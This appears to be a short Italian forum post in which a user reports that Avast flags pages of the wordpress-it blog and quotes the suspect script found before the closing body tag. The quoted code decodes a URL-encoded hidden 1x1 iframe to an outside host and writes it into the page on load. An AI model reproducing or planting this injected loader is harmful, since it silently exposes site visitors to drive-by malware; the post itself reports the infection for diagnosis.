Avast mi segnala qualcosa nelle pagine del blog di wordpress-it. Non so se il codice maligno sia questo (mi risulta poco prima della chiusura del body):
enc = “%3Ciframe%20width%3D1%20height%3D1%20border%3D0%20frameborder%3D0%20src%3D%27http%3A//twoster.in/info/in.cgi%3F5%27%3E%3C/iframe%3E”;
dec = unescape(enc);
document.write(dec);